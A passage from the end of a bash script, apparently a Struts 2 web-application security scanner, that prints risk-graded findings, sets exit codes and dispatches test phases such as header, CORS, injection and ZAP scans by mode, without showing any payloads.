        fi
        
        # Medium Risk Findings
        if [ $MEDIUM_RISK_FINDINGS -gt 0 ]; then
            echo -e "\n${YELLOW} MEDIUM RISK FINDINGS ($MEDIUM_RISK_FINDINGS):${NC}"
            for finding in "${MEDIUM_RISK_LIST[@]}"; do
                echo -e "${YELLOW}    $finding${NC}"
            done
        fi
        
        # Low Risk Findings
        if [ $LOW_RISK_FINDINGS -gt 0 ]; then
            echo -e "\n${GREEN} LOW RISK FINDINGS ($LOW_RISK_FINDINGS):${NC}"
            for finding in "${LOW_RISK_LIST[@]}"; do
                echo -e "${GREEN}    $finding${NC}"
            done
        fi
        
        # Informational Findings (only show if there are any after filtering)
        if [ $INFORMATIONAL_FINDINGS -gt 0 ]; then
            echo -e "\n${CYAN}  INFORMATIONAL FINDINGS ($INFORMATIONAL_FINDINGS):${NC}"
            for finding in "${INFO_LIST[@]}"; do
                echo -e "${CYAN}    $finding${NC}"
            done
        fi
    else
        echo -e "\n${GREEN} No security findings detected!${NC}"
    fi
    
    # Show error summary if any errors occurred
    if [ $ERROR_COUNT -gt 0 ]; then
        echo -e "\n${RED} ERROR SUMMARY${NC}"
        echo -e "${RED}===============${NC}"
        echo -e "${RED}Total Errors Encountered: $ERROR_COUNT${NC}"
        echo -e "${YELLOW} Review error details above for troubleshooting guidance${NC}"
        echo ""
    fi
    
    echo -e "\n${GREEN} Security assessment completed - results shown above${NC}"
    
    # Exit code based on risk level and errors
    if [ $ERROR_COUNT -gt 0 ]; then
        echo -e "${YELLOW} Exiting with error code due to $ERROR_COUNT errors encountered${NC}"
        exit 3  # Error exit code
    elif [ "$risk_level" = "HIGH" ]; then
        exit 2  # High risk exit code
    elif [ "$risk_level" = "MEDIUM" ]; then
        exit 1  # Medium risk exit code
    else
        exit 0  # Success exit code
    fi
}

# Cleanup function
cleanup() {
    # Remove temporary ZAP log file
    rm -f /tmp/zap_startup.log 2>/dev/null
}

# Set up cleanup on script exit
trap cleanup EXIT

# Main execution
echo " STRUTS 2 COMPREHENSIVE SECURITY SCAN"
echo "Target: $TARGET_URL"
echo "Started: $(date)"
echo "========================================"
echo ""

# Run tests based on mode
case $MODE in
    "zap-only")
        # ZAP-only mode: single phase
        echo -e "${CYAN}Mode: ZAP-only (Deep vulnerability scanning)${NC}"
        PHASE_NUM=1
        run_zap_scan
        ;;
    "quick")
        # Quick mode: basic tests only
        echo -e "${CYAN}Mode: Quick (~5 minutes, no ZAP)${NC}"
        PHASE_NUM=1
        run_security_headers_test
        PHASE_NUM=2
        run_cors_tests  
        PHASE_NUM=3
        run_info_disclosure_tests
        # Add Struts 2 quick tests
        PHASE_NUM=4
        run_struts2_enumeration
        ;;
    "auth-only")
        # Authentication testing only
        echo -e "${CYAN}Mode: Authentication-only testing${NC}"
        PHASE_NUM=1
        run_authentication_tests
        ;;
    "ognl-scan")
        # OGNL injection testing only
        echo -e "${CYAN}Mode: OGNL Injection scan (Struts 2 specific)${NC}"
        PHASE_NUM=1
        run_ognl_injection_tests
        PHASE_NUM=2
        run_action_method_tests
        PHASE_NUM=3
        run_struts2_enumeration
        ;;
    *)
        # Full mode: ALL phases including new Struts 2 tests
        echo -e "${CYAN}Mode: Full comprehensive scan (20-60 minutes)${NC}"
        
        # Original phases (1-6)
        PHASE_NUM=1
        run_security_headers_test
        PHASE_NUM=2
        run_cors_tests
        PHASE_NUM=3
        run_xss_tests
        PHASE_NUM=4
        run_sql_injection_tests
        PHASE_NUM=5
        run_info_disclosure_tests
        PHASE_NUM=6
        run_zap_scan
        
        # NEW Struts 2-specific phases (7-10)
        PHASE_NUM=7
        run_authentication_tests
        PHASE_NUM=8
        run_ognl_injection_tests
        PHASE_NUM=9
        run_action_method_tests
        PHASE_NUM=10
        run_struts2_enumeration
        ;;
esac

# Generate final summary
generate_summary
